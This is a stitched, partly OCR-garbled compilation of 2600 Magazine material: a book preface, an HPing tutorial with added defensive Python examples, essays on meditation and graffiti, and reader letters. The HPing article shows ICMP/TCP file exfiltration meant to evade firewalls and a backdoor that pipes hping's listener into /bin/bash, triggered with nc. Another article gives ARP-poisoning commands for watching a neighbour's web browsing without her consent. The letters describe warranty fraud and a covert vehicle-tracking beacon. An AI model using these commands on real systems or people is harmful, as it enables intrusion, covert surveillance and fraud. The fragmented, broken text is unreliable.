2600 Magazine
and disconnect.

In each of these distinct periods, we found there to be one remaining constant. The hacker culture has remained true to its beliefs and largely unaffected by the changing world around us. If you look at one of our articles from our early days and compare it to something from this issue, you'll notice that, while the technology is completely different, the spirit behind the writing has more or less remained the same. It's always about asking questions, performing all sorts of experiments, theorizing, and, above all else, sharing the results with the rest of us. Throughout all of the change and turmoil, this much has remained.

Once we realized that we had these three unique decades and a common thread that ran between them, it was just a matter of picking the stories that best summed up what was going on at the time. As it turned out, this was another daunting task. There were just so many fascinating pieces that have gone into our pages over the years that it became painful to decide which ones would be included and which would have to be left out. And even after we had done a whole lot of cutting and trimming, it was all too clear that we just had an overabundance of material. Trying to fit it into a 360 page book would be next to impossible. In fact, just the 1980s could have easily filled the entire page allocation if we had let it.

Fortunately, our publishers had the good sense to lobby for a dramatic increase in size for the book and we found ourselves with a limit that was over 600 pages instead. As the months went on, this wound up being increased once more to nearly 900 pages! Apparently, the publishers had just as difficult a time figuring out what to cut as we did. What better endorsement could we possibly ask for?

article in our very first issue ended with the sentence: "Turn the page and become a part of our unique world.")

We want to thank the many readers who have been suggesting something like this for years. We do listen to these suggestions and we're happy that the opportunity presented itself where we could actually bring these ideas to fruition. We also want to thank Wiley Publishing and the many people over there who have worked with us on this project since it began last year. We now have something which will make a good deal of our material a lot more accessible, not only to our existing readers but to a vast number of others who have never even heard of 2600 and whose only perception of what hackers are about comes from the mass media. This is a tremendous opportunity to have our voices heard in whole new arenas and to open some doors in what others only see as walls.

And for many of us, this will be an amazing trip do
es
port:
[root@doormouse ~]# hping2 localhost -S -p 22
HPING localhost (lo 127.0.0.1): S set, 40 headers + 0 data bytes
len=44 ip=127.0.0.1 ttl=64 DF id=0 sport=22 flags=SA seq=0 win=32792 rtt=0.2 ms

In this example, we've asked HPing to send the localhost TCP/SYN packets (-S), with the destination TCP port set to 22, which is for ssh. The reply packets we get are the next part of the TCP three-way handshake, with the SYN/ACK flags set. This is indicated in HPing by the flags=SA field. This tells us that the TCP port is open and that we are allowed to access that TCP port. This is useful in testing whether or not your firewall rules are set up properly. Let's say that you have a web server and that you want to ensure that people from the 10.20.30.0/24 network are allowed to access it. You can just HPing the server with the SYN flag set and see if you get a reply.

You can set all, some, or none of the TCP flags if you wish to check TCP stacks or your Intrusion Protection System (IPS). For example, if you have an IPS set up and you want to test your filters against odd TCP flag settings, you can use HPing to do that:

[root@doormouse ~]# hping2 localhost -FPU -p 999

00:00:00:00:00:00, ethertype IPv4 (0x0800), length 34, (tos 0x0, ttl 64, id 8251, offset 0, flags [none], proto IPv6 (41), length 20) 127.0.0.1 > 127.0.0.1: [|ip6]
    0x0000:  4500 0014 203b 0000 4029 5c84 7f00 0001  E....;..@)\.....
    0x0010:  7f00 0001
13:33:09.025631 00:00:00:00:00:00 > 00:00:00:00:00:00, ethertype IPv4 (0x0800), length 34, (tos 0x0, ttl 64, id 41944, offset 0, flags [none], proto IPv6 (41), length 20) 127.0.0.1 > 127.0.0.1: [|ip6]
    0x0000:  4500 0014 a3d8 0000 4029 d8e6 7f00 0001  E.......@)......
    0x0010:  7f00 0001
13:33:10.026089 00:00:00:00:00:00 > 00:00:00:00:00:00, ethertype IPv4 (0x0800), length 34, (tos 0x0, ttl 64, id 18791, offset 0, flags [none], proto IPv6 (41), length 20) 127.0.0.1 > 127.0.0.1: [|ip6]
    0x0000:  4500 0014 4967 0000 4029 3358 7f00 0001  E...Ig..@)3X....
    0x0010:  7f00 0001

The last of the basics I'm going to talk about is the ability to specify your source address. This is excellent for testing anti-spoofing features of your firewall or to perform "idle" scans. I leave that as a project for you to figure out on your own.

Now that you know how to craft basic packets with HPing, you may start to wonder why you would use this for anything except port scans or security-related measures. Imagine that you work for a managed service provider and that you need to monitor both system health and service health. You can incorporate HPing into your service health monitoring by setting up a basic script which will craft packets, send them to the service in question, deliver a payload if needed, and then report back to your management station whether or not the service is up, depending on the response received by HPing.
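The reporting half of such a monitoring script, as an added example that is not from the original article: it reads captured hping2 SYN-probe output in the format shown above and compares each port's state with the firewall policy you expect. The function names, the expected-policy table and the sample captures are assumptions constructed for illustration.

```python
import re

# key=value fields in an hping2 reply line, e.g. "sport=22 flags=SA"
FIELD_RE = re.compile(r"(\w+)=(\S+)")

HEADER = "HPING localhost (lo 127.0.0.1): S set, 40 headers + 0 data bytes\n"

# Constructed captures of "hping2 <host> -S -p <port>" output, one per probed port.
CAPTURES = {
    22: HEADER + "len=44 ip=127.0.0.1 ttl=64 DF id=0 sport=22 "
                 "flags=SA seq=0 win=32792 rtt=0.2 ms\n",
    999: HEADER + "len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=999 "
                  "flags=RA seq=0 win=0 rtt=0.0 ms\n",
    80: HEADER,  # no reply lines at all: the probe was dropped or the host is down
}

# Hypothetical policy: what the firewall rules are supposed to allow.
EXPECTED = {22: "open", 999: "closed", 80: "open"}


def parse_replies(output):
    """Return one dict of fields per reply line (lines with sport= and flags=)."""
    replies = []
    for line in output.splitlines():
        fields = dict(FIELD_RE.findall(line))
        if "flags" in fields and "sport" in fields:
            replies.append(fields)
    return replies


def port_state(flags):
    """Map the TCP flags of a reply to a SYN probe onto a port state."""
    if "S" in flags and "A" in flags:
        return "open"        # SYN/ACK: second step of the three-way handshake
    if "R" in flags:
        return "closed"      # RST: nothing listening, or an active reject
    return "unexpected"


def probe_result(output, port):
    """Summarise every reply that came back from the probed port."""
    states = {port_state(r["flags"])
              for r in parse_replies(output) if int(r["sport"]) == port}
    if not states:
        return "no-reply"
    if "open" in states:
        return "open"
    return "closed" if states == {"closed"} else "unexpected"


def audit(expected, captures):
    """List (port, expected, observed) for every port that violates the policy."""
    mismatches = []
    for port in sorted(expected):
        observed = probe_result(captures.get(port, ""), port)
        if observed != expected[port]:
            mismatches.append((port, expected[port], observed))
    return mismatches


if __name__ == "__main__":
    for port, want, got in audit(EXPECTED, CAPTURES):
        print(f"port {port}: expected {want}, observed {got}")
```
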
Advanced Features
One of HPing's nice features is the ability to transfer files across a "ping" session. I've only done this with text files, but I'm sure that someone out there knows how to successfully transfer a binary file like an image. Suppose you have a text file that you need to transfer, but all the normal file transfer options like FTP(S), SFTP/SCP, and HTTP(S) are blocked by a firewall; however, ICMP is allowed out. You can use HPing to transfer the file across ICMP. First you will have to set your target server to be in a listen state:

[root@doormouse ~]# hping2 localhost --listen signature --safe --icmp
Warning: Unable to guess the output interface
hping2 listen mode
[main] memlockall(): Success
Warning: can't disable memory paging!

Now that we have someone listening, let's transfer the file from our source machine:

[root@doormouse temp]# hping2 localhost --icmp -d 100 --sign signature --file ./random.stuff
HPING localhost (lo 127.0.0.1): icmp mode set, 28 headers + 100 data bytes
[main] memlockall(): Success
Warning: can't disable memory paging!
len=128 ip=127.0.0.1 ttl=64 id=12770 icmp_seq=0 rtt=0.3 ms
len=128 ip=127.0.0.1 ttl=64 id=12773 icmp_seq=1 rtt=0.1 ms
len=128 ip=127.0.0.1 ttl=64 id=12775 icmp_seq=2 rtt=0.2 ms
len=128 ip=127.0.0.1 ttl=64 id=12777 icmp_seq=3 rtt=0.2 ms

--- localhost hping statistic ---
4 packets tramitted, 4 packets received, 0% packet loss
round-trip min/avg/max = 0.1/0.2/0.3 ms

The listening side will then show:

hping2 listen mode
[main] memlockall(): Success
Warning: can't disable memory paging!
Line 1
Line 2
Line 3
Line 4
End of Important File

Looks like we managed to transfer our important file successfully! Most people won't sit and examine ICMP logs, so you may be able to evade any firewall or IPS in the way.
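For the people who do examine ICMP traffic, here is an added example (not from the original article) of what this transfer looks like to a monitor: echo requests whose data is neither of the stock ping fill patterns, is mostly text, and starts with the same marker in every packet. The packet builder, thresholds and sample packets are constructed assumptions; the payloads mimic the --sign signature and -d 100 options used above.

```python
import os
import struct

WINDOWS_PING = b"abcdefghijklmnopqrstuvwabcdefghi"  # stock Windows ping data


def build_echo_request(payload, seq):
    """Constructed IPv4 + ICMP echo request (checksums left at 0 for the sample)."""
    icmp = struct.pack("!BBHHH", 8, 0, 0, 0x1234, seq) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(icmp), seq, 0, 64, 1, 0,
                     bytes([127, 0, 0, 1]), bytes([127, 0, 0, 1]))
    return ip + icmp


def echo_payload(packet):
    """Return the data of an ICMP echo request, or None for anything else."""
    if len(packet) < 20 or packet[0] >> 4 != 4:
        return None
    ihl = (packet[0] & 0x0F) * 4
    if packet[9] != 1 or len(packet) < ihl + 8:   # IP protocol 1 = ICMP
        return None
    if packet[ihl] != 8:                          # ICMP type 8 = echo request
        return None
    return packet[ihl + 8:]


def is_stock_ping(payload):
    """True for empty data or the fill patterns of the common ping tools."""
    if not payload or payload == WINDOWS_PING[:len(payload)]:
        return True
    for skip in (8, 16):  # iputils ping: timestamp, then bytes counting upward
        tail = payload[skip:]
        if len(tail) >= 4 and all((b - a) % 256 == 1
                                  for a, b in zip(tail, tail[1:])):
            return True
    return False


def text_ratio(payload):
    """Fraction of printable bytes, ignoring trailing NUL padding."""
    data = payload.rstrip(b"\x00")
    if not data:
        return 0.0
    printable = sum(1 for b in data if 32 <= b < 127 or b in (9, 10, 13))
    return printable / len(data)


def analyze(packets, min_marker=4):
    """Summarise the echo requests in a capture and extract a repeated marker."""
    payloads = [p for p in map(echo_payload, packets) if p is not None]
    odd = [p for p in payloads if not is_stock_ping(p)]
    marker = os.path.commonprefix(odd) if len(odd) >= 2 else b""
    return {
        "echo_requests": len(payloads),
        "non_stock": len(odd),
        "text_like": sum(1 for p in odd if text_ratio(p) >= 0.9),
        "shared_marker": marker if len(marker) >= min_marker else b"",
    }


# Constructed samples: three transfer-style packets (marker + file chunk,
# padded to 100 bytes) and two ordinary pings.
CHUNKS = [b"Line 1\nLine 2\n", b"Line 3\nLine 4\n", b"End of Important File\n"]
TRANSFER = [build_echo_request((b"signature" + c).ljust(100, b"\x00"), i)
            for i, c in enumerate(CHUNKS)]
LINUX_DATA = struct.pack("<qq", 1214000000, 123456) + bytes(range(0x10, 0x38))
NORMAL = [build_echo_request(LINUX_DATA, 1), build_echo_request(WINDOWS_PING, 2)]

if __name__ == "__main__":
    print(analyze(TRANSFER + NORMAL))
```

The same marker check applies to the TCP variant described next, since the signature leads the data of every packet there as well.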
Let's examine the same scenario, except the location you are at only allows CUPS outbound and does deep packet inspection, so you can't re-bind your FTP or SFTP server to that port. I know this is far-fetched, but work with me on this one. You can transfer the file to your server over CUPS without interfering with the running CUPS server on the remote end:

[root@doormouse ~]# netstat -na | grep LIST | grep 631
tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN
[root@doormouse ~]# hping2 localhost --listen signature --safe -p 631
Warning: Unable to guess the output interface
hping2 listen mode
[main] memlockall(): Success
Warning: can't disable memory paging!
Line 1
Line 2
Line 3
Line 4
End of Important File

The command to send the file over TCP with no flags looks like this:

[root@doormouse temp]# hping2 localhost -p 631 -d 100 --sign signature --file ./random.stuff
HPING localhost (lo 127.0.0.1): NO FLAGS are set, 40 headers + 100 data bytes
[main] memlockall(): Success
Warning: can't disable memory paging!
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=631 flags=RA seq=0 win=0 rtt=0.0 ms

Keep in mind that files transferred this way are not encrypted. Although most people won't be inspecting packets that much, anyone snooping on the wire can grab your information.

You can also use HPing as a back door. Get the following command running on a remote host, possibly through an insecure website with an unchecked input variable: hping2 -I eth0 --listen signature -p 80 | /bin/bash. Then, use netcat to do something like this: echo "signaturereboot;" | nc 444.0.000 80. Anything after the word "signature" in the echo command will be processed by the /bin/bash to which HPing's output is being piped, and so the server reboots. Try this with your own machines: use signaturetouch remote.touched.file; to see that the listener will process what is being asked of it. You won't see anything on the console, but when you stop HPing and do a quick ls, you should now see a new file called remote.touched.file in the current directory.

Another use for this technique is as a "port knocker." If you don't want to leave your SSH daemon up and running all the time, set up HPing on your SSH server. Whenever you want to start your SSH daemon, use the command signatureservice sshd start;.

Conclusion

As you can see, HPing is a great tool for both basic and more advanced applications, and it can be used in a variety of different ways. It's excellent for helping people to learn how the IP stack works, especially the TCP flag settings, and it's great to use in or along with custom applications. The topics I've covered here in this article are just the beginning, and I strongly urge you to become familiar with this powerful tool.

Shouts: magikh0e, Ihab, Exial, JohnPNP and, of course, eXoDuS. (YNBABWARL!)
Summer 2008
by Sai Emrys
2600@saizai.com
AIM, #ca2600: saizai
GPG: 0xAFF1F292

My experience has been that meditation is a subject that frequently polarizes people: some believe credulously in all kinds of unsupported nonsense, while some reject everything wholesale in the name of skepticism.

However, meditation is a useful way to hack your mind state. Rather than just taking some guru's preferred version of one technique as the One True Way, you just have to get to know a variety of the techniques available, tweak them to work for your own world-view and symbol set, and understand what about them makes them actually work.

I've talked with a fair number of people about this, and one misconception that comes up often is that "meditation" exclusively means "sitting in a dark, quiet room in lotus position smelling incense and thinking about nothing." This is indeed one method of meditation, known as mushin or "empty mind." It is far from the only one, though, and it's not necessarily the best first approach for everyone, especially not for people used to multitasking, like most hackers.

Another misconception is that meditation is to be treated as something that you do only in special short periods of time. This implies that most of the time you are not in a meditative mind state, but the whole point of meditation is to change your everyday life.

There certainly is a place for separate, focused meditation, but here is one class of methods I call "all-point" techniques. What makes this class of methods work is the combination of a very rich environment and the strategy of not concentrating overly on any particular piece of it. These methods are particularly well-suited to beginning one's meditation experience and to easy, everyday practice.

1. "Soft eyes"

This is a relatively common technique in martial arts.

Instead of focusing on the eyes or hands of the person you are talking with (or trying to disarm), aim your eyes towards the neck area and keep a soft focus, both mentally and literally.

A good way to check this technique is to ask yourself a series of questions:

Where is their right hand and what are they holding?
What is in their pockets? (Pants, chest, under-arm holster, buttocks...)
How tense are the muscles around and above their eyes? Shoulders? Neck?
How fast are they breathing?
How are they about to move?
Who and what is nearby? Where is the nearest exit?

The way to tell whether you're doing this right is to see if you can answer all of these questions with only minimal, if any, movement of your eyes and attention; you should be able to see all of it simultaneously.

This is not an exclusively martial technique, though it's certainly useful for that; try just doing it with everyone you see. The point is to be able to notice as much as possible, without telegraphing what you are looking at and without having your attention exclusively focused on one thing. Magicians and fighters both like it when they can use misdirection to make you not notice things which are within your sight.

2. Really enjoying nature

Go somewhere you'll find beautiful. I'll use hills as an example since that's what I most enjoy, but anything vibrant will work.

Normally, when most people go to "enjoy nature," they either barely notice it at all because they're distracted by equipment, their latest argument, planning the next day's work, etc.; they notice one spotlighted bit at a time; or they notice only a very vague ambiance.

Instead, try to individually see everything in detail.

An easy way to do this is to start by limiting your attention to two things; for example, feeling wind on your skin and seeing the clouds move. See as much detail as you can in those two things. Then add a third, such as the feel of sunlight or the movement of a patch of grass nearby.

The key lies in adding more things to your attention simultaneously without losing detail in the previously perceived ones. This can very quickly become overwhelming; the amount of information in any natural scene is extremely dense. Even a small patch of grass will have enough movement and detail in it to swamp your multithreading.

Fortunately, this is a learnable skill. With practice, you'll find that your effective threadcount and buffer size go up.

As a nice bonus, the more you can really notice, the more enjoyable it is.

3. Individuals in crowds

What did you notice the last time you walked down the street?

It's interesting that the amount you relate to people as individuals tends to be inversely related to the number of people present. Crowds gain a separate character of their own: it's easier to simply interpret them as a mass. This is also true in reverse; being a member of a crowd makes one less apt to empathize with others as individuals. Look up the case of Kitty Genovese for one sad example.

Next time you are out, try to notice faces, body posture, and the distances people stand from each other, rather than glazing over. Don't attach too much to each personal drama; just notice, recognize, and keep moving.

The goal for this is to increase the scope of things which you can take in consciously, making a "mere" walk down the street a somewhat more alive experience. For more on recognizing facial emotions, I highly recommend the work of Paul Ekman, and for more on the significance of proximity in human interaction, I recommend The Hidden Dimension and The Silent Language, both by Edward T. Hall.

Conclusion

There are many other situations in which you can practice this "all-point" technique: while playing RTSs and other games with lots of things happening at once; while listening to complex multi-part music such as Rachmaninoff, Bach, or Godspeed You! Black Emperor; while noticing all the background sounds wherever you are, including computer fans, hard drive clicks, traffic, your own breathing, radios, neighbors, and so on; or while experiencing any environment.

The purpose of this class of techniques is to learn to be able to deal with highly multithreaded, content-rich, real-time situations in a serene manner, so you can not only experience as much of these situations as possible but also do so without being overwhelmed. This is a lot like the eventual purpose of traditional empty-mind meditation; it's just a different approach. I've given just a few ways of doing this. It's up to you to figure out one that'll be effective for you in your daily life. The more that you can integrate this way of interacting with the world as a daily habit, the more effective it'll be at shifting your baseline mind state.

If you have any feedback on this or are interested in seeing more, please contact me. I'm working on a book tentatively entitled A Hacker's Guide to Meditation: Practical Recipes Without the Dogma, which aims to be a complete guide to all known classes of effective meditation techniques, of which this article discusses just one, from a pragmatic, open-source perspective. This includes techniques traditionally taught as meditation, psychotherapy, and more. If you find this useful, or if you have a technique or variant I might not have heard of, I'd like to know.

Happy mind-hacking!

Sai Emrys is a recent graduate of UC Berkeley in cognitive science, looking to do doctoral work in the neuroscience of empathy. Other interests include running the Language Creation Conference (conlangs.berkeley.edu), interpreting music in American Sign Language (YouTube saizai), coding in Ruby on Rails, and consulting on international business.
by Uriah C.
I enjoy leaving my wireless access point available for others to connect to and use the Internet. There is one catch, however: I get to play and monitor the traffic whenever I want to. In this article, I will describe a pastime that is fun and revealing of your neighbors.

I recently found a new host on my network to play with. New friends are fun! I frequently use EtherApe to quickly monitor my network traffic, and I found a new computer name on my network. Knowing that this person was on my network, I fired up nmap to do a quick ping sweep to confirm my new friend. My new friend's computer name was her real name, and I could see that she had the IP address of 192.168.1.104. The family computer was on 192.168.1.103, my laptop was on 192.168.1.101, and the access point was on 192.168.1.1.

Since I had a new friend to play with, I decided to view the traffic that was going through. Of course I could do that with EtherApe, but I wanted more than just IP addresses and URLs. Besides, I was itching to use the program webspy for a little bit.

Before I go into the fun too much, let me explain what webspy is. Webspy is a program that is part of Doug Song's dsniff suite. These tools are designed to penetration test your network, and, in my case, have fun with those on my network. I must stress that this should only be done on your own network or on one that you have been given permission to perform such tests. Now that the legal stuff is out of the way, let's get on with the fun.

The first thing I have to do is to ARP poison the host and the gateway. This way, the traffic will be routed to my computer. This is done by opening two terminal windows.

In the first terminal, type:

# arpspoof -i eth1 -t 192.168.1.1 192.168.1.104

In the second terminal, type:

# arpspoof -i eth1 -t 192.168.1.104 192.168.1.1

Then, I need to make sure that I am forwarding traffic to the proper locations, so I use fragrouter. In a third terminal, type:

# fragrouter -i eth1 -B1

Now let's see what this does. The first arpspoof command sends forged arp information over the interface (-i) eth1 to the target (-t) 192.168.1.1 that my computer is 192.168.1.104, while the second terminal tells the target 192.168.1.104 that my computer is 192.168.1.1. Meanwhile, fragrouter sends the broadcast address (-B1) all traffic that has come in, so there is no interruption of service.
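What the forged replies described above look like from the defending side, as an added example that is not part of the original article: a small ARP watcher that flags an IP address moving to a new MAC, one MAC claiming several IPs, and a pinned gateway entry being contradicted. The IP addresses are the article's; the MAC addresses, class name and sample frames are constructed for illustration.

```python
import socket
import struct
from collections import defaultdict

# Constructed MAC addresses (documentation range), one per host in the article.
GATEWAY_MAC = "00:00:5e:00:53:01"   # 192.168.1.1, the access point
VICTIM_MAC = "00:00:5e:00:53:68"    # 192.168.1.104
LAPTOP_MAC = "00:00:5e:00:53:65"    # 192.168.1.101, the machine running arpspoof


def mac_bytes(text):
    return bytes.fromhex(text.replace(":", ""))


def mac_text(raw):
    return ":".join(f"{b:02x}" for b in raw)


def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """Constructed Ethernet frame with an ARP reply: sender_ip is-at sender_mac."""
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + b"\x08\x06"
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, 2)
    arp += mac_bytes(sender_mac) + socket.inet_aton(sender_ip)
    arp += mac_bytes(target_mac) + socket.inet_aton(target_ip)
    return eth + arp


def parse_arp(frame):
    """Return (sender_mac, sender_ip) for IPv4-over-Ethernet ARP, else None."""
    if len(frame) < 42 or frame[12:14] != b"\x08\x06":
        return None
    htype, ptype, hlen, plen, _oper = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return mac_text(frame[22:28]), socket.inet_ntoa(frame[28:32])


class ArpWatch:
    def __init__(self, pinned=None):
        self.pinned = dict(pinned or {})   # ip -> MAC that must never change
        self.table = {}                    # ip -> last MAC seen
        self.claims = defaultdict(set)     # MAC -> IPs it currently claims

    def observe(self, frame):
        """Update state from one frame and return the alerts it raises."""
        parsed = parse_arp(frame)
        if parsed is None:
            return []
        mac, ip = parsed
        alerts = []
        if ip in self.pinned and self.pinned[ip] != mac:
            alerts.append(("pinned-mismatch", ip, self.pinned[ip], mac))
        old = self.table.get(ip)
        if old is not None and old != mac:
            alerts.append(("ip-moved", ip, old, mac))
            self.claims[old].discard(ip)
        self.table[ip] = mac
        newly_claimed = ip not in self.claims[mac]
        self.claims[mac].add(ip)
        if newly_claimed and len(self.claims[mac]) > 1:
            alerts.append(("mac-multi-ip", mac, sorted(self.claims[mac])))
        return alerts


def run_sample():
    """Replay three honest replies, then the two forged ones from the article."""
    frames = [
        build_arp_reply(GATEWAY_MAC, "192.168.1.1", VICTIM_MAC, "192.168.1.104"),
        build_arp_reply(VICTIM_MAC, "192.168.1.104", GATEWAY_MAC, "192.168.1.1"),
        build_arp_reply(LAPTOP_MAC, "192.168.1.101", GATEWAY_MAC, "192.168.1.1"),
        # arpspoof -t 192.168.1.1 192.168.1.104
        build_arp_reply(LAPTOP_MAC, "192.168.1.104", GATEWAY_MAC, "192.168.1.1"),
        # arpspoof -t 192.168.1.104 192.168.1.1
        build_arp_reply(LAPTOP_MAC, "192.168.1.1", VICTIM_MAC, "192.168.1.104"),
    ]
    watch = ArpWatch(pinned={"192.168.1.1": GATEWAY_MAC})
    return [alert for frame in frames for alert in watch.observe(frame)]


if __name__ == "__main__":
    for alert in run_sample():
        print(alert)
```
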
Now, it's time for the last few steps. I need to run webspy and open a browser. Then, I can have the fun of seeing whatever someone else sees. So, I would open up two more terminals. In the fourth terminal, type:

# webspy -i eth1 192.168.1.104

And, finally, in the fifth terminal, type:

# firefox

Now, Firefox opens up, and I get to see the websites that my new friend opens up in real time. I've only seen one problem: if an ad pops up on a separate page from the rest of a website, it'll be shown separately from the rest of the original site. So, if my friend goes to MySpace, then I see MySpace, but it quickly flashes over to show just the ad without the rest of the site. I have my browser set to open these ads in different tabs, so I can see the page and the ad.

You never know what kind of sites others may visit, so you should do this with discretion, especially if the kids are running around the house and the material coming up is questionable.
by scOut64
scOut64@yahoo.ca
I find that one of my longest-running fascinations, computer hacking, has a lot to do with my greatest passion and hobby, graffiti art. These are two very controversial subjects, and discussing them can usually generate a great response, depending on who you ask. This is not a how-to article by any means, but rather a way to shed some light on the similarities between two of my favorite pastimes. But I'll still include the standard disclaimer that getting caught participating in either of these activities might get you in trouble.

The first thing I can find these two subjects have in common is the reaction that you get when you tell someone that you do one or the other. If you tell someone you're a computer hacker, you can usually expect confused or wary looks. People assume that you've done shady things before, and they approach conversation choosing their words carefully, assuming that you might take some of the information and use it against them. They might not be aware that the hacking you do might be completely legal. You might be a pen tester for a security firm, or you just might like running wargames on your network with your friends. It depends on your definition of a hacker.

Similarly, when you tell someone that you're a graffiti artist, some people automatically assume that you're a vandal. They think you're one of those stereotypical guys who tags up convenience stores at night, or that you're one of the people who vandalized all those New York City trains years ago. They might think that your bedroom is a mess and that all your school books are scribbled on. They may not realize that there are plenty of legal areas to tag up and that what you do falls completely within the law, or that you might be a graphic design student whose style is completely digital. It depends on your definition of graffiti.

Another similarity between these two

York City. Yes, it caused all kinds of chaos, and many people were penalized once the city implemented graffiti laws. Like many great things, because it was new and brought change, people didn't like it. Likewise, when hacking started becoming extremely popular, there were no laws or governing bodies to regulate what went on. With these two cultures and many others, once the government felt things got a little too out of control, they stepped in and "supervised."

There are a number of other similarities between the two fields:
8 i ssue,
ave
I have a few questi ons and requests for advi ce
somet hi ng to add that was not menti oned. Thi s mfo
from the phone phreaks, the net savvy, and the en-
comes from personal experi ence as a customer.
gi neers among us. Is there such thi ng as a
p
repai d
Whi l e Thomps had a secti on of hi s arti cl e ti tl ed
cel l phone servi ce that has GPS (or other tnangul a-
"Free Phones" he onl y tal ked about getti ng di scounts
ti on) features for real -ti me tracki ng? Woul d usi ng an
(whi ch I mi ght add was qui te i ngeni ous), not getti ng
anonymi zer websi te whi l e tracki ng i t over the net be
a phone for free. I t i s possi bl e to obtai n phones from
suffi ci ent to dust a trai l of the IP address of the "desk-
them for free.
top" porti on of the survei l l ance?
You don't even have to be el i gi bl e for an up
-
I
'
m al so seeki ng
advi ce on a project I envi si on
grade or buy addi ti onal accessori es to do thi s. Al l
compl eti ng: an economi cal way t o modi fy a com-
you need i s a phone that i s sti l l under warranty wi th
mon GMRS or FRS radi o to functi on wi th a control
AT&T. They gi ve you a one year warranty when you
uni t that woul d transmi t a si gnal wi th a 1 kHz tone
buy a phone from them. A l ot of peopl e don't even
at, for exampl e, ten second i nterval s whi l e a vehi cl e
real i ze they have thi s warranty. So let's say you own
i s stopped, and at three second i nterval s once move-
an HTC 8525 . You want the li l t, don't you . . . . I t has
ment of the vehi cl e i s detected. A combi nati on of
GPS, you know you want i t. What you do i s cal l i n
a pi ezoel ectri c swi tch on a mi croprocessor whi ch
and tel l them you have a probl em wi th your phone.
woul d control the radi o comes to my mi nd. I have
Make a probl em up; i t has to be somethi ng unre-
pl enty of experi ence at troubl eshooti ng, repai ri ng,
l ated to the battery and can't seem l i ke i t woul d be
and bui l di ng el ectroni cs contrapti ons but next to
consi dered abuse or other damage that woul d voi d
none engi neeri ng them as i s t he nature of thi s proj -
your warranty. For i nstance, tel l them the recepti on
ect. The pri ces of ones I 've shopped for commerci al l y
seems t o be degraded from when you fi rst purchased
have been somewhere between absurd and astro-
the phone, or maybe the phone freezes al l the ti me
nomi cal . And a huge percentage of that i nvestment
or buttons i ntermi ttentl y work. They wi l l gl adl y try to
goes i nto a ri ver or gets beat wi th a sl edgehammer i f
sol ve the probl em for you, but of course you wi l l tel l
the transmi tter gets di scovered. I ' m al so consi der i ng
t hem none of t he sol uti ons worked. They wi l l end
changi ng t he radi o's crystal so as t o avoi d t he si gnal
up shi ppi ng you another phone. After you get the
getti ng "wal ked over" by anyone transmi tti ng near-
phone, cal l them up agai n. Tel l them this one has the
by on the same frequency, i ntercepted by curi ous
same probl em, or another probl em of your choi ce.
scanni ng enthusi asts, etc. As of now, my RF scan-
You want them to send you another phone.
ner woul d be used as the receiver, but eventual l y I
You wi l l do t hi s a total of three ti mes, then on
pl an to progress to a recei ver wi th an anal og meter
your fi nal cal l you wi l l tel l them that you have had
movement and h i ghl y sensi tive gai n control . Perhaps
enough, repl aci ng these 8525s i sn't getti ng anywhere
the thi rd stage of thi s progressi on wi l l be to bui l d
- you want a di fferent phone. The next cl osest phone
my own tri angul ati on receiver. Anyway, even i n i ts
is the li l t, so that is what you can get out of them. I
most basi c form, thi s "bumper beacon" wi l l gi ve me
have done t hi s twi ce, worked perfectl y both ti mes.
the abi l i ty to more qui ckl y fi nd, then narrow down
The onl y drawback wi th thi s method i s that you can
the l ocati on of the parked target vehi cl e (provi ded of
onl y get a s i mi l ar phone to what you have currentl y.
course that it is wi thi n range of suspected l ocati ons) .
You coul d work your way up to the best phone over
I wi l l greatl y appreci ate feedback and advi ce on how
Pa
g
e 34 2600 Ma
g
azine
I can desi gn and accompl i sh thi s l i ttl e project.
J ust in case you're wonderi ng about my moti ves,
I ' m a professi onal "peopl e watcher" i . e. , a Pri vate I n
vesti gator, provi di ng needed servi ces for good peopl e
bei ng done wrong by others i n matters of ci vi l l aw.
The PI message boards and emai l groups woul d go
ape-dung if such questi ons as the ones above were
posted there. Pl us the desi gn questi ons woul d l i kel y
be too techn i cal for al l but a few of them.
Carl
The only prepaid service we're aware of with full-blown GPS is Boost Mobile's iDEN product (they market both iDEN and CDMA products, and only the iDEN product includes a precise GPS receiver). You could, in theory, write an application to log the location periodically and post it to a website using the data connectivity package.

Sprint also sells something called Sprint Family Locator. See https://sfl.sprintpcs.com/finder-sprint-family/signIn.htm for details. This will provide the approximate location of your target. However, it is not available as a prepaid service.
Dear 2600:
Are you guys still accepting photos of payphones
for your website? There are many interesting payphones
in Taiwan now, but they have evolved into
something more like kiosk computers with touch
screens. I can send some photos to you if you would
like to see them.
Tommy
By all means send them in. The address is
payphones@2600.com. Be sure to use the highest
quality settings on your camera as low settings don't
print well in the magazine.
Dear 2600:
First off, I really appreciate the hard work you
guys put into producing such a great publication.
It's changed my perception of technology greatly. A
friend and I have been inspired to start a 2600 meeting
in our local area (Belfast, Northern Ireland) and
we were wondering if there is any particular format
that these meetings need to have?
redtape
It's all pretty straightforward. The meetings
need to be open to all in a public area with no
admission charge, age restriction, or anything
like that. There's a more detailed set of guidelines
on our website at www.2600.com/meetings. It's
also important to keep us updated by emailing
meetings@2600.com so we know you're continuing
to run the meetings. Good luck!
Dear 2600:
Is there any particular reason you replied to me
with a gigantic email of stuff I didn't need to know?
Do you get many questions to meetings@2600.com?
Because as I must contact you about the meetings in
Tulsa, I'm not exactly served by this.
Did I do something wrong?
Joseph
You didn't do anything wrong but that's the way
the system operates. Most people who email that address
are looking for information on the meetings so
we have our robot automatically send a full list back
plus the set of meeting guidelines. Some people enter
into a dialogue with what they assume is a really fast
typing human. But you only get that big mail the first
time you send email to the address (and after a certain
number of weeks beyond that). The alternative
to this system would be to have yet another email
address for those people reporting on meetings. That
would lead to a lot more work and traffic than simply
deleting that one piece of mail we send.
Dear 2600:
I am trying to expand the links page on my website
www.bayareakicks.com, and I would like to add
your website (www.2600.com/phones) to that list.
Some websites do not like when others link to them,
so I would like to receive permission from you first.
The thousands of daily viewers that read my
website are Internet savvy and are always looking for
new websites to visit. I figured you wouldn't mind if
I link to your site since it would give you slightly increased
traffic. Does this sound OK to you? Are you
able to link to my website? I look forward to your
reply.
Mike
